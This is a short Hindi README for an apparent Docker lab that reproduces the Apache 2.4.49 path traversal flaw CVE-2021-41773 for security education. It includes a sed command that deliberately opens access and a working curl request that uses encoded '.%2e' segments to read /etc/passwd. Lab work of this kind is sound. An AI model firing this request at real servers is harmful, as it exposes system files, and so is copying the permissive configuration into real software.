
CVE-2021-41773 Apache पथ ट्रैवर्सल भेद्यता के लिए डॉकर-आधारित प्रयोगशाला वातावरण, सुरक्षा परीक्षण और शिक्षा के लिए PoC शोषण और विस्तृत वॉकथ्रू के साथ।
../ सहित पथों का उपयोग करके वेब रूट के बाहर की फ़ाइलों तक पहुँच सकता है
-> बेस इमेज: httpd:2.4.49 (दोष वाला संस्करण)
-> 'sed -i 's/Require all denied/Require all granted/g' : पथ ट्रैवर्सल की अनुमति और बाहरी पहुँच
-> Apache परिभाषा
-> 8080 पोर्ट को कंटेनर के 80 पोर्ट से मैप करना
Docker चलाएँ
PoC चलाएँ
-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
-> /etc/passwd में संवेदनशील जानकारी होती है, %2e .. का एन्कोडेड शब्द है जो ऊपरी निर्देशिका में जाने का आदेश है
-> पथ में हेरफेर करके सर्वर को /etc/passwd तक पहुँचने और इसे आउटपुट करने के लिए बाध्य करता है
-> उपरोक्त चित्र के अनुसार संवेदनशील निर्देशिका तक पहुँच संभव
https://github.com/JIYUN02/cve-2021-41773
-> कमिट इतिहास मौजूद है